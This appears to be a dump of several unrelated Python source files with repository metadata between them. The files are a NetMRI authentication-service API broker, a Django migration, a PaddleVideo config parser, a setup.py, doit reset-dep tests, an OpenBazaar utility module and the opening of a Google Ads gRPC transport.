:param val_f_timeout: If op_timeout is specified, the field named in this input will be compared to the value in timeout using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_timeout must be specified if op_timeout is specified.
:type val_f_timeout: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_timeout: If op_timeout is specified, this value will be compared to the value in timeout using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_timeout must be specified if op_timeout is specified.
:type val_c_timeout: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_updated_at: The operator to apply to the field updated_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. updated_at: The date and time the record was last modified in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_updated_at: If op_updated_at is specified, the field named in this input will be compared to the value in updated_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_updated_at must be specified if op_updated_at is specified.
:type val_f_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_updated_at: If op_updated_at is specified, this value will be compared to the value in updated_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_updated_at must be specified if op_updated_at is specified.
:type val_c_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return auth_services: An array of the AuthService objects that match the specified input criteria.
:rtype auth_services: Array of AuthService
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def destroy(self, **kwargs):
"""Deletes the specified auth service from NetMRI.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The id of the authentication service.
:type id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("destroy"), kwargs)
def create(self, **kwargs):
"""Create a new Authentication Service
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param service_name: The name of the authentication service, must be unique
:type service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param auth_method: The authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory).
:type auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param priority: The priority assigned to this authentication service
:type priority: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param description: Description/comment about this authentication service
:type description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` True
:param enabled_ind: A flag indicating whether the authentication service settings is enabled or disabled
:type enabled_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users
:type enabled_authz_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 5
:param timeout: The timeout interval of the service authentication servers
:type timeout: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_domain: Authentication Active Directory Domain name or LDAP BaseDN to use for search. (required for LDAP & Active Directory methods)
:type auth_domain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` cn
:param user_attr: User attribute ID for LDAP authentication method (required for LDAP methods).
:type user_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` memberOf
:param group_attr: Group membership attribute ID for LDAP authentication method. The LDAP server has to be configured to use memberOf Overlay.
:type group_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param auth_type: A flag indicating whether the search request to the LDAP server is performed anonymously or needs authentication using a privileged bind User and Password. (values: 'true' for Authenticated, 'false' for anonymous')
:type auth_type: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param bind_user: The bind User complete 'dn' in case LDAP Authenticated connection is needed to request search to find user
:type bind_user: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param bind_passwd: The bind User password in case LDAP Authenticated connection is needed to request search to find user
:type bind_passwd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` subtree
:param search_scope: Specify the scope of the LDAP search.<br>
- 'base': Search only the base object.<br> - 'one': Search the entries immediately below the base object.<br> - 'subtree': Search the whole tree below (and including) the base object. This is the default.
:type search_scope: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` infoblox
:param tacacs_service: The name of the defined custom service for Infoblox.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> }
:type tacacs_service: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` na-group-info
:param tacacs_group_attr: The name of the group attribute defined in the Tacacs+ server to retrieve the user's groups list.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> }
:type tacacs_group_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 7779
:param radius_vendor_id: The Infoblox Vendor ID defined in the radius dictionary.<br> VENDOR infoblox 7779
:type radius_vendor_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 10
:param radius_vsa_id: The Vendor Specific Attribute ID as defined in the radius server dictionary to retrieve the user's groups list.<br> ATTRIBUTE na-group-info 10 string infoblox
:type radius_vsa_id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_id: The new authentication service id.
:rtype service_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_name: The new authentication service name.
:rtype service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_description: The new authentication service description.
:rtype service_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_entity_id: SAML Entity ID
:rtype saml_entity_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_metadata: SAML Metadata URL
:rtype saml_metadata: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert: SAML Certificate
:rtype saml_cacert: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_fn: SAML Certificate file name
:rtype saml_cacert_fn: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_key: SAML Key
:rtype saml_cacert_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_key_fn: SAML Key file name
:rtype saml_cacert_key_fn: String
"""
return self.api_request(self._get_method_fullname("create"), kwargs)
def update(self, **kwargs):
"""Update an existing Authentication Service
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The id of the authentication service to modify
:type id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param service_name: The name of the authentication service, must be unique
:type service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_method: The authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory).
:type auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param priority: The priority assigned to this authentication service
:type priority: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param description: Description/comment of this authentication service
:type description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enabled_ind: A flag indicating whether the authentication service settings is enabled or disabled
:type enabled_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users
:type enabled_authz_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timeout: The timeout interval of the service authentication servers
:type timeout: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_domain: Authentication Active Directory Domain name or LDAP BaseDN to use for search. (required for LDAP & Active Directory methods)
:type auth_domain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param user_attr: User attribute ID for LDAP authentication method (required for LDAP methods).
:type user_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param group_attr: Group membership attribute ID for LDAP authentication method. The LDAP server has to be configured to use memberOf Overlay.
:type group_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_type: A flag indicating whether the search request to the LDAP server is performed anonymously or needs authentication using a privileged bind User and Password. (values: 'true' for Authenticated, 'false' for anonymous')
:type auth_type: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param bind_user: The bind User complete 'dn' in case LDAP Authenticated connection is needed to request search to find user
:type bind_user: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param bind_passwd: The bind User password in case LDAP Authenticated connection is needed to request search to find user
:type bind_passwd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param search_scope: Specify the scope of the LDAP search.<br>
- 'base': Search only the base object.<br> - 'one': Search the entries immediately below the base object.<br> - 'subtree': Search the whole tree below (and including) the base object. This is the default.
:type search_scope: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param tacacs_service: The name of the defined custom service for Infoblox.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> }
:type tacacs_service: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param tacacs_group_attr: The name of the group attribute defined in the Tacacs+ server to retrieve the user's groups list.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> }
:type tacacs_group_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param radius_vendor_id: The Infoblox Vendor ID defined in the radius dictionary.<br> VENDOR infoblox 7779
:type radius_vendor_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param radius_vsa_id: The Vendor Specific Attribute ID as defined in the radius server dictionary to retrieve the user's groups list.<br> ATTRIBUTE na-group-info 10 string infoblox
:type radius_vsa_id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_id: The new authentication service id.
:rtype service_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_name: The new authentication service name.
:rtype service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_description: The new authentication service description.
:rtype service_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_entity_id: SAML Entity ID
:rtype saml_entity_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_metadata: SAML Metadata URL
:rtype saml_metadata: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert: SAML Certificate
:rtype saml_cacert: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_fn: SAML Certificate file name
:rtype saml_cacert_fn: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_key: SAML Key
:rtype saml_cacert_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_key_fn: SAML Key file name
:rtype saml_cacert_key_fn: String
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
def duplicate(self, **kwargs):
"""Duplicate an authentication service.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier for the authentication service.
:type id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_id: The new authentication service id.
:rtype service_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_name: The new authentication service name.
:rtype service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_description: The new authentication service description.
:rtype service_description: String
"""
return self.api_request(self._get_method_fullname("duplicate"), kwargs)
def auth_servers(self, **kwargs):
"""List all servers defined for the requested Authentication Service
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The id of the authentication service to list the servers for
:type id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("auth_servers"), kwargs)
def auth_test_creds(self, **kwargs):
"""Test credentials for this service Authentication Servers that are stored in db.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param service_id: The id of the authentication service to test
:type service_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param username: The login of the user to test
:type username: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param password: The password of the user to test
:type password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param nohtml: Convert output to simple text
:type nohtml: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The id of the session output file to display.
:type id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param read: Offset in bytes from the start of the file.
:type read: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return id: The id of the session output file.
:rtype id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return read: Offset in bytes from the start of the file, to be used in the next auth_test_creds call, in order to retrieve the next lines of the output.
:rtype read: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return output: Result of the credential test.
:rtype output: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return status: Status of the remaining output data to dump:
<br><dd> 0: if the dump of the credential test output is completed.
<br><dd> 1: if there is still output data to dump.
:rtype status: Integer
"""
return self.api_request(self._get_method_fullname("auth_test_creds"), kwargs)
| 45.21696
| 551
| 0.576273
|
8a77c01b8f406eac0194dde8ff68f36a1f189a7b
| 617
|
py
|
Python
|
forum/migrations/0027_c.py
|
shmilyoo/ggxxBBS
|
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
|
[
"MIT"
] | null | null | null |
forum/migrations/0027_c.py
|
shmilyoo/ggxxBBS
|
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
|
[
"MIT"
] | null | null | null |
forum/migrations/0027_c.py
|
shmilyoo/ggxxBBS
|
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('forum', '0026_a_b'),
]
operations = [
migrations.CreateModel(
name='C',
fields=[
('id', models.AutoField(serialize=False, primary_key=True)),
('name', models.CharField(default=b'', max_length=16)),
('time', models.DateTimeField(auto_now=True)),
],
options={
},
bases=(models.Model,),
),
]
| 23.730769
| 76
| 0.523501
|
c7b6ca60dd2bb29a50f7e726b0325d56cbd04d1d
| 2,322
|
py
|
Python
|
applications/FootballAction/train_lstm/scenario_lib/config.py
|
XYZ916829/PaddleVideo
|
8e422ee9fd4e08b711e80b7e9ff627c331f31c30
|
[
"Apache-2.0"
] | 5
|
2022-01-30T07:35:58.000Z
|
2022-02-08T05:45:20.000Z
|
applications/FootballAction/train_lstm/scenario_lib/config.py
|
liutinglong/PaddleVideo
|
6b8a723360ac652ca7aafa1908e6c67a67cf5ea5
|
[
"Apache-2.0"
] | null | null | null |
applications/FootballAction/train_lstm/scenario_lib/config.py
|
liutinglong/PaddleVideo
|
6b8a723360ac652ca7aafa1908e6c67a67cf5ea5
|
[
"Apache-2.0"
] | 1
|
2022-01-24T16:27:01.000Z
|
2022-01-24T16:27:01.000Z
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from configparser import ConfigParser
except BaseException:
from ConfigParser import ConfigParser
import logging
CONFIG_SECS = [
'train',
'valid',
'test',
'infer',
]
def parse_config(cfg_file):
"""parse_config"""
parser = ConfigParser()
cfg = AttrDict()
parser.read(cfg_file)
for sec in parser.sections():
sec_dict = AttrDict()
for k, v in parser.items(sec):
try:
v = eval(v)
except BaseException:
pass
setattr(sec_dict, k, v)
setattr(cfg, sec.upper(), sec_dict)
return cfg
def merge_configs(cfg, sec, args_dict):
"""merge_configs"""
assert sec in CONFIG_SECS, "invalid config section {}".format(sec)
sec_dict = getattr(cfg, sec.upper())
for k, v in args_dict.items():
if v is None:
continue
try:
if hasattr(sec_dict, k):
setattr(sec_dict, k, v)
except BaseException:
pass
return cfg
def print_configs(cfg, mode):
"""print_configs"""
logger = logging.getLogger(__name__)
logger.info(
"---------------- {:>5} Arguments ----------------".format(mode))
for sec, sec_items in cfg.items():
logger.info("{}:".format(sec))
for k, v in sec_items.items():
logger.info(" {}:{}".format(k, v))
logger.info("-------------------------------------------------")
class AttrDict(dict):
"""AttrDict"""
def __getattr__(self, key):
return self[key]
def __setattr__(self, key, value):
if key in self.__dict__:
self.__dict__[key] = value
else:
self[key] = value
| 27.317647
| 74
| 0.594746
|
753c3e1d1006ffe29675a1567579dd3bea800956
| 675
|
py
|
Python
|
setup.py
|
thearn/github-auto-tools
|
ce9227a2407c45710a09e7a32eebf1568a068c92
|
[
"Apache-2.0"
] | 1
|
2020-07-16T17:26:11.000Z
|
2020-07-16T17:26:11.000Z
|
setup.py
|
silky/github-auto-tools
|
ce9227a2407c45710a09e7a32eebf1568a068c92
|
[
"Apache-2.0"
] | 4
|
2020-11-22T21:11:15.000Z
|
2020-11-29T15:33:16.000Z
|
setup.py
|
silky/github-auto-tools
|
ce9227a2407c45710a09e7a32eebf1568a068c92
|
[
"Apache-2.0"
] | 1
|
2016-06-04T09:19:51.000Z
|
2016-06-04T09:19:51.000Z
|
from setuptools import setup, find_packages
import sys, os
setup(name='github_clonetools',
version='0.1',
description="Command line tools to clone all github repos of a given account",
author='Tristan Hearn',
author_email='tristanhearn@gmail.com',
url='https://github.com/thearn/github-auto-tools',
license='Apache 2.0',
packages=['github_clonetools'],
include_package_data=True,
zip_safe=False,
entry_points={
'console_scripts':
['cloneall=github_clonetools.github_all:clone',
'clonerepos=github_clonetools.github_repo:clone',
'clonegists=github_clonetools.github_gists:clone']
}
)
| 30.681818
| 82
| 0.69037
|
83bff45fb9ffa4c4e7cfe41932c8676163d74ec1
| 5,229
|
py
|
Python
|
tests/test_cmd_resetdep.py
|
m4ta1l/doit
|
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
|
[
"MIT"
] | 1,390
|
2015-01-01T21:11:47.000Z
|
2022-03-31T11:35:44.000Z
|
tests/test_cmd_resetdep.py
|
m4ta1l/doit
|
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
|
[
"MIT"
] | 393
|
2015-01-05T11:18:29.000Z
|
2022-03-20T11:46:46.000Z
|
tests/test_cmd_resetdep.py
|
m4ta1l/doit
|
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
|
[
"MIT"
] | 176
|
2015-01-07T16:58:56.000Z
|
2022-03-28T12:12:11.000Z
|
from io import StringIO
import pytest
from doit.cmd_resetdep import ResetDep
from doit.dependency import TimestampChecker, get_md5, get_file_md5
from doit.exceptions import InvalidCommand
from doit.task import Task
from tests.conftest import tasks_sample, CmdFactory, get_abspath
class TestCmdResetDep(object):
def test_execute(self, dep_manager, dependency1):
output = StringIO()
tasks = tasks_sample()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks,
dep_manager=dep_manager)
cmd_reset._execute()
got = [line.strip() for line in output.getvalue().split('\n') if line]
expected = ["processed %s" % t.name for t in tasks]
assert sorted(expected) == sorted(got)
def test_file_dep(self, dep_manager, dependency1):
my_task = Task("t2", [""], file_dep=['tests/data/dependency1'])
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert "processed t2\n" == got
dep = list(my_task.file_dep)[0]
timestamp, size, md5 = dep_manager._get(my_task.name, dep)
assert get_file_md5(get_abspath("data/dependency1")) == md5
def test_file_dep_up_to_date(self, dep_manager, dependency1):
my_task = Task("t2", [""], file_dep=['tests/data/dependency1'])
dep_manager.save_success(my_task)
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert "skip t2\n" == got
def test_file_dep_change_checker(self, dep_manager, dependency1):
my_task = Task("t2", [""], file_dep=['tests/data/dependency1'])
dep_manager.save_success(my_task)
dep_manager.checker = TimestampChecker()
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert "processed t2\n" == got
def test_filter(self, dep_manager, dependency1):
output = StringIO()
tasks = tasks_sample()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks,
dep_manager=dep_manager)
cmd_reset._execute(pos_args=['t2'])
got = output.getvalue()
assert "processed t2\n" == got
def test_invalid_task(self, dep_manager):
output = StringIO()
tasks = tasks_sample()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks,
dep_manager=dep_manager)
pytest.raises(InvalidCommand, cmd_reset._execute, pos_args=['xxx'])
def test_missing_file_dep(self, dep_manager):
my_task = Task("t2", [""], file_dep=['tests/data/missing'])
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert ("failed t2 (Dependent file 'tests/data/missing' does not "
"exist.)\n") == got
def test_missing_dep_and_target(self, dep_manager, dependency1, dependency2):
task_a = Task("task_a", [""],
file_dep=['tests/data/dependency1'],
targets=['tests/data/dependency2'])
task_b = Task("task_b", [""],
file_dep=['tests/data/dependency2'],
targets=['tests/data/dependency3'])
task_c = Task("task_c", [""],
file_dep=['tests/data/dependency3'],
targets=['tests/data/dependency4'])
output = StringIO()
tasks = [task_a, task_b, task_c]
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks,
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert ("processed task_a\n"
"processed task_b\n"
"failed task_c (Dependent file 'tests/data/dependency3'"
" does not exist.)\n") == got
def test_values_and_results(self, dep_manager, dependency1):
my_task = Task("t2", [""], file_dep=['tests/data/dependency1'])
my_task.result = "result"
my_task.values = {'x': 5, 'y': 10}
dep_manager.save_success(my_task)
dep_manager.checker = TimestampChecker() # trigger task update
reseted = Task("t2", [""], file_dep=['tests/data/dependency1'])
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[reseted],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert "processed t2\n" == got
assert {'x': 5, 'y': 10} == dep_manager.get_values(reseted.name)
assert get_md5('result') == dep_manager.get_result(reseted.name)
| 42.169355
| 81
| 0.605852
|
d92041b03487fbbcb917e572313bc66fef689c77
| 1,660
|
py
|
Python
|
node/util.py
|
martindale/OpenBazaar
|
620012832d614992d1097f66c75b24c1fa6648e5
|
[
"MIT"
] | null | null | null |
node/util.py
|
martindale/OpenBazaar
|
620012832d614992d1097f66c75b24c1fa6648e5
|
[
"MIT"
] | null | null | null |
node/util.py
|
martindale/OpenBazaar
|
620012832d614992d1097f66c75b24c1fa6648e5
|
[
"MIT"
] | 1
|
2020-07-15T05:03:34.000Z
|
2020-07-15T05:03:34.000Z
|
import os
import sys
import webbrowser
import platform
def is_mac():
os_name = platform.uname()[0]
return os_name == 'Darwin'
def open_default_webbrowser(url, protocol="http"):
"""
Open URL at the default browser.
@param url: The URL to open.
@type url: str
@param protocol: The internet protocol to use.
@type protocol: str
@return: True on success, False on failure.
@rtype: bool
"""
if not url.startswith(protocol):
# If protocol is absent from the url, attach it, otherwise
# the file `url` will be opened in Linux flavors.
full_url = "%s://%s" % (protocol, url)
else:
full_url = url
try:
success = webbrowser.open(full_url)
except webbrowser.Error:
success = False
print "[openbazaar:%s.%s] Could not open default web browser at %s" % (
"util",
"open_default_webbrowser",
url
)
return success
def osx_check_dyld_library_path():
"""This is a necessary workaround as you cannot set the DYLD_LIBRARY_PATH
by the time python has started."""
if not os.environ.get('DYLD_LIBRARY_PATH'):
print (
'WARNING: DYLD_LIBRARY_PATH not set, this might cause issues'
'\nwith openssl elliptic curve cryptography and other libraries.'
'\nIt is recommended that you stop OpenBazaar and set your'
'\nDYLD_LIBRARY_PATH environment variable as follows:'
'\n export DYLD_LIBRARY_PATH=$(brew --prefix openssl)/'
'lib:${DYLD_LIBRARY_PATH}'
'\nthen restart OpenBazaar.'
)
sys.exit(1)
| 28.62069
| 79
| 0.61988
|
d51c28c810964e609fa0edbccaab5a931d8cfc80
| 10,114
|
py
|
Python
|
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
|
batardo/google-ads-python
|
a39748521847e85138fca593f3be2681352ad024
|
[
"Apache-2.0"
] | null | null | null |
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
|
batardo/google-ads-python
|
a39748521847e85138fca593f3be2681352ad024
|
[
"Apache-2.0"
] | null | null | null |
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
|
batardo/google-ads-python
|
a39748521847e85138fca593f3be2681352ad024
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v5.resources.types import location_view
from google.ads.googleads.v5.services.types import location_view_service
from .base import LocationViewServiceTransport, DEFAULT_CLIENT_INFO
class LocationViewServiceGrpcTransport(LocationViewServiceTransport):
"""gRPC backend transport for LocationViewService.
Service to fetch location views.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
